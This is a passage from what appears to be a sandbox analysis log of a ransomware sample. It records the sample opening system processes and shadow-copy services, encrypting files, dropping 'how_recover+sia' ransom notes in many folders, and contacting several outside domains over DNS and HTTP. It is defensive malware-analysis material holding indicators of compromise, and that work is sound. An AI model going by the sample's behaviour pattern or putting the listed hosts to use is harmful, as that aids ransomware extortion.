  2431. Target:   C:\Windows\System32\svchost.exe    Source:   C:\Users\Administrator\AppData\Roaming\icwyx-a.exe  
  2432.    
  2433. 904
  2434. 328
  2435.          
  2436. Process
  2437. Opened
  2438.    
  2439.  
  2440. Target:   C:\Windows\System32\spoolsv.exe    Source:   C:\Users\Administrator\AppData\Roaming\icwyx-a.exe  
  2441.    
  2442. 968
  2443. 328
  2444.          
  2445. Process
  2446. Opened
  2447.    
  2448.  
  2449. Target:   C:\Windows\System32\svchost.exe    Source:   C:\Users\Administrator\AppData\Roaming\icwyx-a.exe  
  2450.    
  2451. 1064
  2452. 328
  2453.          
  2454. Process
  2455. Opened
  2456.    
  2457.  
  2458. Target:   C:\Windows\System32\taskhost.exe    Source:   C:\Users\Administrator\AppData\Roaming\icwyx-a.exe  
  2459.    
  2460. 1164
  2461. 328
  2462.          
  2463. Process
  2464. Opened
  2465.    
  2466.  
  2467. Target:   C:\Windows\System32\dwm.exe    Source:   C:\Users\Administrator\AppData\Roaming\icwyx-a.exe  
  2468.    
  2469. 1244
  2470. 328
  2471.          
  2472. Process
  2473. Opened
  2474.    
  2475.  
  2476. Target:   C:\Windows\System32\svchost.exe    Source:   C:\Users\Administrator\AppData\Roaming\icwyx-a.exe  
  2477.    
  2478. 1340
  2479. 328
  2480.          
  2481. Process
  2482. Opened
  2483.    
  2484.  
  2485. Target:   C:\Windows\explorer.exe    Source:   C:\Users\Administrator\AppData\Roaming\icwyx-a.exe  
  2486.    
  2487. 1092
  2488. 328
  2489.          
  2490. Process
  2491. Opened
  2492.    
  2493.  
  2494. Target:   C:\Windows\System32\wbem\WmiPrvSE.exe    Source:   C:\Users\Administrator\AppData\Roaming\icwyx-a.exe  
  2495.    
  2496. 940
  2497. 328
  2498.          
  2499. Process
  2500. Opened
  2501.    
  2502.  
  2503. Target:   C:\Program Files\Internet Explorer\iexplore.exe    Source:   C:\Users\Administrator\AppData\Roaming\icwyx-a.exe  
  2504.    
  2505. 1976
  2506. 328
  2507.          
  2508. Process
  2509. Opened
  2510.    
  2511.  
  2512. Target:   N/A    Source:   C:\Users\Administrator\AppData\Roaming\icwyx-a.exe  
  2513.    
  2514. 384
  2515. 328
  2516.          
  2517. Process
  2518. Opened
  2519.    
  2520.  
  2521. Target:   C:\Program Files (x86)\Internet Explorer\iexplore.exe    Source:   C:\Users\Administrator\AppData\Roaming\icwyx-a.exe  
  2522.    
  2523. 1460
  2524. 328
  2525.          
  2526. Process
  2527. Opened
  2528.    
  2529.  
  2530. Target:   C:\Program Files (x86)\Internet Explorer\iexplore.exe    Source:   C:\Users\Administrator\AppData\Roaming\icwyx-a.exe  
  2531.    
  2532. 1312
  2533. 328
  2534.          
  2535. Process
  2536. Opened
  2537.    
  2538.  
  2539. Target:   C:\Program Files (x86)\Internet Explorer9\iexplore.exe    Source:   C:\Users\Administrator\AppData\Roaming\icwyx-a.exe  
  2540.    
  2541. 1324
  2542. 328
  2543.          
  2544. Process
  2545. Opened
  2546.    
  2547.  
  2548. Target:   C:\Program Files (x86)\Internet Explorer9\iexplore.exe    Source:   C:\Users\Administrator\AppData\Roaming\icwyx-a.exe  
  2549.    
  2550. 1852
  2551. 328
  2552.          
  2553. Process
  2554. Opened
  2555.    
  2556.  
  2557. Target:   C:\Windows\System32\wbem\WmiPrvSE.exe    Source:   C:\Users\Administrator\AppData\Roaming\icwyx-a.exe  
  2558.    
  2559. 2056
  2560. 328
  2561.          
  2562. Process
  2563. Opened
  2564.    
  2565.  
  2566. Target:   C:\Windows\System32\taskhost.exe    Source:   C:\Users\Administrator\AppData\Roaming\icwyx-a.exe  
  2567.    
  2568. 2220
  2569. 328
  2570.          
  2571. Process
  2572. Opened
  2573.    
  2574.  
  2575. Target:   C:\Windows\System32\svchost.exe    Source:   C:\Users\Administrator\AppData\Roaming\icwyx-a.exe  
  2576.    
  2577. 2456
  2578. 328
  2579.          
  2580. Process
  2581. Opened
  2582.    
  2583.  
  2584. Target:   C:\Windows\System32\vssadmin.exe    Source:   C:\Users\Administrator\AppData\Roaming\icwyx-a.exe  
  2585.    
  2586. 2336
  2587. 328
  2588.          
  2589. Process
  2590. Opened
  2591.    
  2592.  
  2593. Target:   C:\Windows\System32\conhost.exe    Source:   C:\Users\Administrator\AppData\Roaming\icwyx-a.exe  
  2594.    
  2595. 2168
  2596. 328
  2597.          
  2598. File   
  2599. Failed
  2600.    
  2601. C:\Users\Administrator\AppData\Roaming\DHCPCSVC.DLL
  2602.     328      
  2603. Process
  2604. Opened
  2605.    
  2606.  
  2607. Target:   N/A    Source:   C:\Users\Administrator\AppData\Roaming\icwyx-a.exe  
  2608.    
  2609. 4
  2610. 328
  2611.          
  2612. Process
  2613. Opened
  2614.    
  2615.  
  2616. Target:   N/A    Source:   C:\Users\Administrator\AppData\Roaming\icwyx-a.exe  
  2617.    
  2618. 384
  2619. 328
  2620.          
  2621. Process
  2622. Opened
  2623.    
  2624.  
  2625. Target:   N\AB    Source:   C:\Users\Administrator\AppData\Roaming\icwyx-a.exe  
  2626.    
  2627. 2864
  2628. 328
  2629.          
  2630. Ransom 
  2631.    
  2632. C:\049IoqKhtkpT2\naEhPKZY.xls
  2633. MD5:  e20105be75fb0fac4e89425c38dfc2a8
  2634.              
  2635. Malicious  Alert   
  2636. Ransomware
  2637.    
  2638. Message:   Ransomware Activity    Detail:   Ransomware Activity  
  2639.              
  2640. Malicious  Alert   
  2641. Misc  Anom
  2642.    
  2643. Message:   Ransomware Activity    Detail:   Ransomware Activity  
  2644.              
  2645. File   
  2646. Failed
  2647.    
  2648. C:\Users\Administrator\AppData\Roaming\RASADHLP.DLL
  2649.     328      
  2650. Process
  2651. Opened
  2652.    
  2653.  
  2654. Target:   N/A    Source:   C:\Users\Administrator\AppData\Roaming\icwyx-a.exe  
  2655.    
  2656. 4
  2657. 328
  2658.          
  2659. Process
  2660. Opened
  2661.    
  2662.  
  2663. Target:   N/A    Source:   C:\Users\Administrator\AppData\Roaming\icwyx-a.exe  
  2664.    
  2665. 384
  2666. 328
  2667.          
  2668. Process
  2669. Opened
  2670.    
  2671.  
  2672. Target:   C:\Windows\System32\VSSVC.exe    Source:   C:\Users\Administrator\AppData\Roaming\icwyx-a.exe  
  2673.    
  2674. 2864
  2675. 328
  2676.          
  2677. Network
  2678. Dns  Query
  2679.    
  2680.  Protocol  Type:  udp   Qtype:  Host Address   Hostname:  myexternalip.com
  2681.  Imagepath:  c:\Users\Administrator\AppData\Roaming\icwyx-a.exe
  2682.     328      
  2683. Malicious  Alert   
  2684. Network  Activity
  2685.    
  2686. Message:   Network outbound communication attempted    Detail:   Process attempting connections via dns_query  
  2687.              
  2688. Malicious  Alert   
  2689. Misc  Anom
  2690.    
  2691. Message:   Persistance with Self Delete Activity    Detail:   Persistance with Self Delete Activity  
  2692.              
  2693. Network
  2694. Dns  Query  Answer
  2695.    
  2696.  Protocol  Type:  udp   IP Address:  199.16.199.2   Hostname:  myexternalip.com
  2697.  Imagepath:  c:\Users\Administrator\AppData\Roaming\icwyx-a.exe
  2698.     328      
  2699. API Call   
  2700.    
  2701.  API Name:  GetSystemDirectoryA   Address:  0x76049c36
  2702.  Params:  [0x2f6c7d0, 260]
  2703.  Imagepath:  C:\Users\Administrator\AppData\Roaming\icwyx-a.exe   DLL Name:  kernel32.dll
  2704.     328      
  2705. API Call   
  2706.    
  2707.  API Name:  Sleep   Address:  0x0041f00b
  2708.  Imagepath:  C:\Users\Administrator\AppData\Roaming\icwyx-a.exe   DLL Name:  kernel32.dll
  2709.     328      
  2710. Process
  2711. Opened
  2712.    
  2713.  
  2714. Target:   N/A    Source:   C:\Users\Administrator\AppData\Roaming\icwyx-a.exe  
  2715.    
  2716. 4
  2717. 328
  2718.          
  2719. Process
  2720. Opened
  2721.    
  2722.  
  2723. Target:   N/A    Source:   C:\Users\Administrator\AppData\Roaming\icwyx-a.exe  
  2724.    
  2725. 384
  2726. 328
  2727.          
  2728. Process
  2729. Opened
  2730.    
  2731.  
  2732. Target:   C:\Windows\System32\VSSVC.exe    Source:   C:\Users\Administrator\AppData\Roaming\icwyx-a.exe  
  2733.    
  2734. 2864
  2735. 328
  2736.          
  2737. Ransom 
  2738.    
  2739. C:\049IoqKhtkpT2\ogasoVZrY.jpg
  2740. MD5:  c58548677bcc532e32b8f700d45b43ab
  2741.              
  2742. Process
  2743. Opened
  2744.    
  2745.  
  2746. Target:   N/A    Source:   C:\Users\Administrator\AppData\Roaming\icwyx-a.exe  
  2747.    
  2748. 4
  2749. 328
  2750.          
  2751. Process
  2752. Opened
  2753.    
  2754.  
  2755. Target:   N/A    Source:   C:\Users\Administrator\AppData\Roaming\icwyx-a.exe  
  2756.    
  2757. 384
  2758. 328
  2759.          
  2760. Process
  2761. Opened
  2762.    
  2763.  
  2764. Target:   C:\Windows\System32\VSSVC.exe    Source:   C:\Users\Administrator\AppData\Roaming\icwyx-a.exe  
  2765.    
  2766. 2864
  2767. 328
  2768.          
  2769. Process
  2770. Opened
  2771.    
  2772.  
  2773. Target:   N/A    Source:   C:\Users\Administrator\AppData\Roaming\icwyx-a.exe  
  2774.    
  2775. 4
  2776. 328
  2777.          
  2778. Process
  2779. Opened
  2780.    
  2781.  
  2782. Target:   N/A    Source:   C:\Users\Administrator\AppData\Roaming\icwyx-a.exe  
  2783.    
  2784. 384
  2785. 328
  2786.          
  2787. 3 Repeated items skipped
  2788. Process
  2789. Opened
  2790.    
  2791.  
  2792. Target:   C:\Windows\System32\dllhost.exe    Source:   C:\Users\Administrator\AppData\Roaming\icwyx-a.exe  
  2793.    
  2794. 2960
  2795. 328
  2796.          
  2797. Process
  2798. Opened
  2799.    
  2800.  
  2801. Target:   N/A    Source:   C:\Users\Administrator\AppData\Roaming\icwyx-a.exe  
  2802.    
  2803. 4
  2804. 328
  2805.          
  2806. Process
  2807. Opened
  2808.    
  2809.  
  2810. Target:   N/A    Source:   C:\Users\Administrator\AppData\Roaming\icwyx-a.exe  
  2811.    
  2812. 384
  2813. 328
  2814.          
  2815. Process
  2816. Opened
  2817.    
  2818.  
  2819. Target:   C:\Windows\System32\dllhost.exe    Source:   C:\Users\Administrator\AppData\Roaming\icwyx-a.exe  
  2820.    
  2821. 2960
  2822. 328
  2823.          
  2824. Process
  2825. Opened
  2826.    
  2827.  
  2828. Target:   N/A    Source:   C:\Users\Administrator\AppData\Roaming\icwyx-a.exe  
  2829.    
  2830. 4
  2831. 328
  2832.          
  2833. Process
  2834. Opened
  2835.    
  2836.  
  2837. Target:   N/A    Source:   C:\Users\Administrator\AppData\Roaming\icwyx-a.exe  
  2838.    
  2839. 384
  2840. 328
  2841.          
  2842. Process
  2843. Opened
  2844.    
  2845.  
  2846. Target:   C:\Windows\System32\dllhost.exe    Source:   C:\Users\Administrator\AppData\Roaming\icwyx-a.exe  
  2847.    
  2848. 2960
  2849. 328
  2850.          
  2851. 2 Repeated items skipped
  2852. Process
  2853. Opened
  2854.    
  2855.  
  2856. Target:   C:\Windows\System32\svchost.exe    Source:   C:\Users\Administrator\AppData\Roaming\icwyx-a.exe  
  2857.    
  2858. 2416
  2859. 328
  2860.          
  2861. 2 Repeated items skipped
  2862. Ransom 
  2863.    
  2864. C:\049IoqKhtkpT2\RsaneooSm.ppt
  2865. MD5:  84bf5c5ade2397b22f49adc6c6e02f0a
  2866.              
  2867. Process
  2868. Opened
  2869.    
  2870.  
  2871. Target:   C:\Windows\System32\svchost.exe    Source:   C:\Users\Administrator\AppData\Roaming\icwyx-a.exe  
  2872.    
  2873. 2416
  2874. 328
  2875.          
  2876. 2 Repeated items skipped
  2877. Ransom 
  2878.    
  2879. C:\049IoqKhtkpT2\yWdIhcc-.doc
  2880. MD5:  c3e6ea4347c76bdbb178869798a2bc0b
  2881.              
  2882. File   
  2883. Created
  2884.    
  2885. C:\049IoqKhtkpT2\how_recover+sia.txt
  2886.     328      
  2887. Network
  2888. Http  Request
  2889.    
  2890.  Protocol  Type:  tcp   Destination  Port:  80   IP Address:  199.16.199.2
  2891.  Imagepath:  c:\Users\Administrator\AppData\Roaming\icwyx-a.exe
  2892.     328      
  2893. API Call   
  2894.    
  2895.  API Name:  Sleep   Address:  0x7760d98d
  2896.  Imagepath:  C:\Users\Administrator\AppData\Roaming\icwyx-a.exe   DLL Name:  kernel32.dll
  2897.     328      
  2898. File   
  2899. Close
  2900.    
  2901. C:\049IoqKhtkpT2\how_recover+sia.txt
  2902.  MD5:  dfd795e9766d0000c6b098809bd6eb64
  2903.  SHA1: 27a30f8981fe9229c0b20a1b4e2818fe5516673e
  2904.     328     2639
  2905. File   
  2906. Created
  2907.    
  2908. C:\049IoqKhtkpT2\how_recover+sia.html
  2909.     328      
  2910. File   
  2911. Close
  2912.    
  2913. C:\049IoqKhtkpT2\how_recover+sia.html
  2914.  MD5:  cc8771cf3419bf0f5d9086c5e24dbba0
  2915.  SHA1: 597094f82fc2949d527748bf1385e60405437d1d
  2916.     328     9372
  2917. Ransom 
  2918.    
  2919. C:\a8bC-VnssffT1\JgieYN.txt
  2920. MD5:  75d738faabeaef4927f3d8f9e16a5ee0
  2921.              
  2922. Network
  2923. Dns  Query
  2924.    
  2925.  Protocol  Type:  udp   Qtype:  Host Address   Hostname:  regiefernando.me
  2926.  Imagepath:  c:\Users\Administrator\AppData\Roaming\icwyx-a.exe
  2927.     328      
  2928. Network
  2929. Dns  Query  Answer
  2930.    
  2931.  Protocol  Type:  udp   IP Address:  199.16.199.3   Hostname:  regiefernando.me
  2932.  Imagepath:  c:\Users\Administrator\AppData\Roaming\icwyx-a.exe
  2933.     328      
  2934. Network
  2935. Http  Request
  2936.    
  2937.  Protocol  Type:  tcp   Destination  Port:  80   IP Address:  199.16.199.3
  2938.  Imagepath:  c:\Users\Administrator\AppData\Roaming\icwyx-a.exe
  2939.     328      
  2940. Network
  2941. Dns  Query
  2942.    
  2943.  Protocol  Type:  udp   Qtype:  Host Address   Hostname:  schriebershof.de
  2944.  Imagepath:  c:\Users\Administrator\AppData\Roaming\icwyx-a.exe
  2945.     328      
  2946. Network
  2947. Dns  Query  Answer
  2948.    
  2949.  Protocol  Type:  udp   IP Address:  199.16.199.4   Hostname:  schriebershof.de
  2950.  Imagepath:  c:\Users\Administrator\AppData\Roaming\icwyx-a.exe
  2951.     328      
  2952. Network
  2953. Http  Request
  2954.    
  2955.  Protocol  Type:  tcp   Destination  Port:  80   IP Address:  199.16.199.4
  2956.  Imagepath:  c:\Users\Administrator\AppData\Roaming\icwyx-a.exe
  2957.     328      
  2958. Network
  2959. Dns  Query
  2960.    
  2961.  Protocol  Type:  udp   Qtype:  Host Address   Hostname:  apotheke-stiepel.com
  2962.  Imagepath:  c:\Users\Administrator\AppData\Roaming\icwyx-a.exe
  2963.     328      
  2964. Network
  2965. Dns  Query  Answer
  2966.    
  2967.  Protocol  Type:  udp   IP Address:  199.16.199.5   Hostname:  apotheke-stiepel.com
  2968.  Imagepath:  c:\Users\Administrator\AppData\Roaming\icwyx-a.exe
  2969.     328      
  2970. Network
  2971. Http  Request
  2972.    
  2973.  Protocol  Type:  tcp   Destination  Port:  80   IP Address:  199.16.199.5
  2974.  Imagepath:  c:\Users\Administrator\AppData\Roaming\icwyx-a.exe
  2975.     328      
  2976. Network
  2977. Dns  Query
  2978.    
  2979.  Protocol  Type:  udp   Qtype:  Host Address   Hostname:  woodenden.com
  2980.  Imagepath:  c:\Users\Administrator\AppData\Roaming\icwyx-a.exe
  2981.     328      
  2982. Network
  2983. Dns  Query  Answer
  2984.    
  2985.  Protocol  Type:  udp   IP Address:  199.16.199.6   Hostname:  woodenden.com
  2986.  Imagepath:  c:\Users\Administrator\AppData\Roaming\icwyx-a.exe
  2987.     328      
  2988. Network
  2989. Http  Request
  2990.    
  2991.  Protocol  Type:  tcp   Destination  Port:  80   IP Address:  199.16.199.6
  2992.  Imagepath:  c:\Users\Administrator\AppData\Roaming\icwyx-a.exe
  2993.     328      
  2994. Network
  2995. Dns  Query
  2996.    
  2997.  Protocol  Type:  udp   Qtype:  Host Address   Hostname:  leboudoirdesbrunettes.com
  2998.  Imagepath:  c:\Users\Administrator\AppData\Roaming\icwyx-a.exe
  2999.     328      
  3000. Network
  3001. Dns  Query  Answer
  3002.    
  3003.  Protocol  Type:  udp   IP Address:  199.16.199.7   Hostname:  leboudoirdesbrunettes.com
  3004.  Imagepath:  c:\Users\Administrator\AppData\Roaming\icwyx-a.exe
  3005.     328      
  3006. Network
  3007. Http  Request
  3008.    
  3009.  Protocol  Type:  tcp   Destination  Port:  80   IP Address:  199.16.199.7
  3010.  Imagepath:  c:\Users\Administrator\AppData\Roaming\icwyx-a.exe
  3011.     328      
  3012. Ransom 
  3013.    
  3014. C:\a8bC-VnssffT1\jRdTsHXUA_.png
  3015. MD5:  fec63e7863dc861bddcbf0be680894ab
  3016.              
  3017. Ransom 
  3018.    
  3019. C:\a8bC-VnssffT1\ltzad_g.xls
  3020. MD5:  fcf159d74ff134a5bb706ea757c890b8
  3021.              
  3022. API Call   
  3023.    
  3024.  API Name:  Sleep   Address:  0x0041f00b
  3025.  Imagepath:  C:\Users\Administrator\AppData\Roaming\icwyx-a.exe   DLL Name:  kernel32.dll
  3026.     328      
  3027. Ransom 
  3028.    
  3029. C:\a8bC-VnssffT1\oFQKz.ppt
  3030. MD5:  c9ea11a479df9f7ebc9488c06fc1200d
  3031.              
  3032. Ransom 
  3033.    
  3034. C:\a8bC-VnssffT1\TBchtna.doc
  3035. MD5:  a413fd453b82bf4d2dfe28453bee4293
  3036.              
  3037. API Call   
  3038.    
  3039.  API Name:  Sleep   Address:  0x0041f00b
  3040.  Imagepath:  C:\Users\Administrator\AppData\Roaming\icwyx-a.exe   DLL Name:  kernel32.dll
  3041.     328      
  3042. Ransom 
  3043.    
  3044. C:\a8bC-VnssffT1\VvnKloLwd.jpg
  3045. MD5:  9404a1ecb3871feb3945b6dd3bd564b8
  3046.              
  3047. Uac
  3048. Service
  3049.    
  3050. Volume Shadow Copy
  3051.              
  3052. Uac
  3053. Service
  3054.    
  3055. Microsoft Software Shadow Copy Provider
  3056.              
  3057. File   
  3058. Created
  3059.    
  3060. C:\a8bC-VnssffT1\how_recover+sia.txt
  3061.     328      
  3062. File   
  3063. Close
  3064.    
  3065. C:\a8bC-VnssffT1\how_recover+sia.txt
  3066.  MD5:  dfd795e9766d0000c6b098809bd6eb64
  3067.  SHA1: 27a30f8981fe9229c0b20a1b4e2818fe5516673e
  3068.     328     2639
  3069. File   
  3070. Created
  3071.    
  3072. C:\a8bC-VnssffT1\how_recover+sia.html
  3073.     328      
  3074. File   
  3075. Close
  3076.    
  3077. C:\a8bC-VnssffT1\how_recover+sia.html
  3078.  MD5:  cc8771cf3419bf0f5d9086c5e24dbba0
  3079.  SHA1: 597094f82fc2949d527748bf1385e60405437d1d
  3080.     328     9372
  3081. File   
  3082. Find
  3083.    
  3084. C:\Boot\*
  3085.     328      
  3086. File   
  3087. Find
  3088.    
  3089. C:\Boot\cs-CZ\*
  3090.     328      
  3091. File   
  3092. Created
  3093.    
  3094. C:\Boot\cs-CZ\how_recover+sia.txt
  3095.     328      
  3096. File   
  3097. Close
  3098.    
  3099. C:\Boot\cs-CZ\how_recover+sia.txt
  3100.  MD5:  dfd795e9766d0000c6b098809bd6eb64
  3101.  SHA1: 27a30f8981fe9229c0b20a1b4e2818fe5516673e
  3102.     328     2639
  3103. File   
  3104. Created
  3105.    
  3106. C:\Boot\cs-CZ\how_recover+sia.html
  3107.     328      
  3108. File   
  3109. Close
  3110.    
  3111. C:\Boot\cs-CZ\how_recover+sia.html
  3112.  MD5:  cc8771cf3419bf0f5d9086c5e24dbba0
  3113.  SHA1: 597094f82fc2949d527748bf1385e60405437d1d
  3114.     328     9372
  3115. File   
  3116. Find
  3117.    
  3118. C:\Boot\da-DK\*
  3119.     328      
  3120. File   
  3121. Created
  3122.    
  3123. C:\Boot\da-DK\how_recover+sia.txt
  3124.     328      
  3125. File   
  3126. Close
  3127.    
  3128. C:\Boot\da-DK\how_recover+sia.txt
  3129.  MD5:  dfd795e9766d0000c6b098809bd6eb64
  3130.  SHA1: 27a30f8981fe9229c0b20a1b4e2818fe5516673e
  3131.     328     2639
  3132. File   
  3133. Created
  3134.    
  3135. C:\Boot\da-DK\how_recover+sia.html
  3136.     328      
  3137. File   
  3138. Close
  3139.    
  3140. C:\Boot\da-DK\how_recover+sia.html
  3141.  MD5:  cc8771cf3419bf0f5d9086c5e24dbba0
  3142.  SHA1: 597094f82fc2949d527748bf1385e60405437d1d
  3143.     328     9372
  3144. File   
  3145. Created
  3146.    
  3147. C:\Boot\de-DE\how_recover+sia.txt
  3148.     328      
  3149. File   
  3150. Close
  3151.    
  3152. C:\Boot\de-DE\how_recover+sia.txt
  3153.  MD5:  dfd795e9766d0000c6b098809bd6eb64
  3154.  SHA1: 27a30f8981fe9229c0b20a1b4e2818fe5516673e
  3155.     328     2639
  3156. File   
  3157. Created
  3158.    
  3159. C:\Boot\de-DE\how_recover+sia.html
  3160.     328      
  3161. File   
  3162. Close
  3163.    
  3164. C:\Boot\de-DE\how_recover+sia.html
  3165.  MD5:  cc8771cf3419bf0f5d9086c5e24dbba0
  3166.  SHA1: 597094f82fc2949d527748bf1385e60405437d1d
  3167.     328     9372
  3168. File   
  3169. Created
  3170.    
  3171. C:\Boot\el-GR\how_recover+sia.txt
  3172.     328      
  3173. File   
  3174. Close
  3175.    
  3176. C:\Boot\el-GR\how_recover+sia.txt
  3177.  MD5:  dfd795e9766d0000c6b098809bd6eb64
  3178.  SHA1: 27a30f8981fe9229c0b20a1b4e2818fe5516673e
  3179.     328     2639
  3180. File   
  3181. Created
  3182.    
  3183. C:\Boot\el-GR\how_recover+sia.html
  3184.     328      
  3185. File   
  3186. Close
  3187.    
  3188. C:\Boot\el-GR\how_recover+sia.html
  3189.  MD5:  cc8771cf3419bf0f5d9086c5e24dbba0
  3190.  SHA1: 597094f82fc2949d527748bf1385e60405437d1d
  3191.     328     9372
  3192. File   
  3193. Created
  3194.    
  3195. C:\Boot\en-US\how_recover+sia.txt
  3196.     328      
  3197. File   
  3198. Close
  3199.    
  3200. C:\Boot\en-US\how_recover+sia.txt
  3201.  MD5:  dfd795e9766d0000c6b098809bd6eb64
  3202.  SHA1: 27a30f8981fe9229c0b20a1b4e2818fe5516673e
  3203.     328     2639
  3204. File   
  3205. Created
  3206.    
  3207. C:\Boot\en-US\how_recover+sia.html
  3208.     328      
  3209. File   
  3210. Close
  3211.    
  3212. C:\Boot\en-US\how_recover+sia.html
  3213.  MD5:  cc8771cf3419bf0f5d9086c5e24dbba0
  3214.  SHA1: 597094f82fc2949d527748bf1385e60405437d1d
  3215.     328     9372
  3216. File   
  3217. Created
  3218.    
  3219. C:\Boot\es-ES\how_recover+sia.txt
  3220.     328      
  3221. File   
  3222. Close
  3223.    
  3224. C:\Boot\es-ES\how_recover+sia.txt
  3225.  MD5:  dfd795e9766d0000c6b098809bd6eb64
  3226.  SHA1: 27a30f8981fe9229c0b20a1b4e2818fe5516673e
  3227.     328     2639
  3228. File   
  3229. Created
  3230.    
  3231. C:\Boot\es-ES\how_recover+sia.html
  3232.     328      
  3233. File   
  3234. Close
  3235.    
  3236. C:\Boot\es-ES\how_recover+sia.html
  3237.  MD5:  cc8771cf3419bf0f5d9086c5e24dbba0
  3238.  SHA1: 597094f82fc2949d527748bf1385e60405437d1d
  3239.     328     9372
  3240. File   
  3241. Created
  3242.    
  3243. C:\Boot\fi-FI\how_recover+sia.txt
  3244.     328      
  3245. File   
  3246. Close
  3247.    
  3248. C:\Boot\fi-FI\how_recover+sia.txt
  3249.  MD5:  dfd795e9766d0000c6b098809bd6eb64
  3250.  SHA1: 27a30f8981fe9229c0b20a1b4e2818fe5516673e
  3251.     328     2639
  3252. File   
  3253. Created
  3254.    
  3255. C:\Boot\fi-FI\how_recover+sia.html
  3256.     328      
  3257. File   
  3258. Close
  3259.    
  3260. C:\Boot\fi-FI\how_recover+sia.html
  3261.  MD5:  cc8771cf3419bf0f5d9086c5e24dbba0
  3262.  SHA1: 597094f82fc2949d527748bf1385e60405437d1d
  3263.     328     9372
  3264. File   
  3265. Created
  3266.    
  3267. C:\Boot\Fonts\how_recover+sia.txt
  3268.     328      
  3269. File   
  3270. Close
  3271.    
  3272. C:\Boot\Fonts\how_recover+sia.txt
  3273.  MD5:  dfd795e9766d0000c6b098809bd6eb64
  3274.  SHA1: 27a30f8981fe9229c0b20a1b4e2818fe5516673e
  3275.     328     2639
  3276. File   
  3277. Created
  3278.    
  3279. C:\Boot\Fonts\how_recover+sia.html
  3280.     328      
  3281. File   
  3282. Close
  3283.    
  3284. C:\Boot\Fonts\how_recover+sia.html
  3285.  MD5:  cc8771cf3419bf0f5d9086c5e24dbba0
  3286.  SHA1: 597094f82fc2949d527748bf1385e60405437d1d
  3287.     328     9372
  3288. File   
  3289. Created
  3290.    
  3291. C:\Boot\fr-FR\how_recover+sia.txt
  3292.     328      
  3293. File   
  3294. Close
  3295.    
  3296. C:\Boot\fr-FR\how_recover+sia.txt
  3297.  MD5:  dfd795e9766d0000c6b098809bd6eb64
  3298.  SHA1: 27a30f8981fe9229c0b20a1b4e2818fe5516673e
  3299.     328     2639
  3300. File   
  3301. Created
  3302.    
  3303. C:\Boot\fr-FR\how_recover+sia.html
  3304.     328      
  3305. File   
  3306. Close
  3307.    
  3308. C:\Boot\fr-FR\how_recover+sia.html
  3309.  MD5:  cc8771cf3419bf0f5d9086c5e24dbba0
  3310.  SHA1: 597094f82fc2949d527748bf1385e60405437d1d
  3311.     328     9372
  3312. File   
  3313. Created
  3314.    
  3315. C:\Boot\hu-HU\how_recover+sia.txt
  3316.     328      
  3317. File   
  3318. Close
  3319.    
  3320. C:\Boot\hu-HU\how_recover+sia.txt
  3321.  MD5:  dfd795e9766d0000c6b098809bd6eb64
  3322.  SHA1: 27a30f8981fe9229c0b20a1b4e2818fe5516673e
  3323.     328     2639
  3324. File   
  3325. Created
  3326.    
  3327. C:\Boot\hu-HU\how_recover+sia.html
  3328.     328      
  3329. File   
  3330. Close
  3331.    
  3332. C:\Boot\hu-HU\how_recover+sia.html
  3333.  MD5:  cc8771cf3419bf0f5d9086c5e24dbba0
  3334.  SHA1: 597094f82fc2949d527748bf1385e60405437d1d
  3335.     328     9372
  3336. File   
  3337. Created
  3338.    
  3339. C:\Boot\it-IT\how_recover+sia.txt
  3340.     328      
  3341. File   
  3342. Close
  3343.    
  3344. C:\Boot\it-IT\how_recover+sia.txt
  3345.  MD5:  dfd795e9766d0000c6b098809bd6eb64
  3346.  SHA1: 27a30f8981fe9229c0b20a1b4e2818fe5516673e
  3347.     328     2639
  3348. File   
  3349. Created
  3350.    
  3351. C:\Boot\it-IT\how_recover+sia.html
  3352.     328      
  3353. File   
  3354. Close
  3355.    
  3356. C:\Boot\it-IT\how_recover+sia.html
  3357.  MD5:  cc8771cf3419bf0f5d9086c5e24dbba0
  3358.  SHA1: 597094f82fc2949d527748bf1385e60405437d1d
  3359.     328     9372
  3360. API Call   
  3361.    
  3362.  API Name:  Sleep   Address:  0x0041f00b
  3363.  Imagepath:  C:\Users\Administrator\AppData\Roaming\icwyx-a.exe   DLL Name:  kernel32.dll
  3364.     328      
  3365. File   
  3366. Created
  3367.    
  3368. C:\Boot\ja-JP\how_recover+sia.txt
  3369.     328      
  3370. File   
  3371. Close
  3372.    
  3373. C:\Boot\ja-JP\how_recover+sia.txt
  3374.  MD5:  dfd795e9766d0000c6b098809bd6eb64
  3375.  SHA1: 27a30f8981fe9229c0b20a1b4e2818fe5516673e
  3376.     328     2639
  3377. File   
  3378. Created
  3379.    
  3380. C:\Boot\ja-JP\how_recover+sia.html
  3381.     328      
  3382. File   
  3383. Close
  3384.    
  3385. C:\Boot\ja-JP\how_recover+sia.html
  3386.  MD5:  cc8771cf3419bf0f5d9086c5e24dbba0
  3387.  SHA1: 597094f82fc2949d527748bf1385e60405437d1d
  3388.     328     9372
  3389. File   
  3390. Created
  3391.    
  3392. C:\Boot\ko-KR\how_recover+sia.txt
  3393.     328      
  3394. File   
  3395. Close
  3396.    
  3397. C:\Boot\ko-KR\how_recover+sia.txt
  3398.  MD5:  dfd795e9766d0000c6b098809bd6eb64
  3399.  SHA1: 27a30f8981fe9229c0b20a1b4e2818fe5516673e
  3400.     328     2639
  3401. File   
  3402. Created
  3403.    
  3404. C:\Boot\ko-KR\how_recover+sia.html
  3405.     328      
  3406. File   
  3407. Close
  3408.    
  3409. C:\Boot\ko-KR\how_recover+sia.html
  3410.  MD5:  cc8771cf3419bf0f5d9086c5e24dbba0
  3411.  SHA1: 597094f82fc2949d527748bf1385e60405437d1d
  3412.     328     9372
  3413. File   
  3414. Created
  3415.    
  3416. C:\Boot\nb-NO\how_recover+sia.txt
  3417.     328      
  3418. File   
  3419. Close
  3420.    
  3421. C:\Boot\nb-NO\how_recover+sia.txt
  3422.  MD5:  dfd795e9766d0000c6b098809bd6eb64
  3423.  SHA1: 27a30f8981fe9229c0b20a1b4e2818fe5516673e
  3424.     328     2639
  3425. File   
  3426. Created
  3427.    
  3428. C:\Boot\nb-NO\how_recover+sia.html
  3429.     328      
  3430. File   
  3431. Close
  3432.    
  3433. C:\Boot\nb-NO\how_recover+sia.html
  3434.  MD5:  cc8771cf3419bf0f5d9086c5e24dbba0
  3435.  SHA1: 597094f82fc2949d527748bf1385e60405437d1d
  3436.     328     9372
  3437. File   
  3438. Created
  3439.    
  3440. C:\Boot\nl-NL\how_recover+sia.txt
  3441.     328      
  3442. File   
  3443. Close
  3444.    
  3445. C:\Boot\nl-NL\how_recover+sia.txt
  3446.  MD5:  dfd795e9766d0000c6b098809bd6eb64
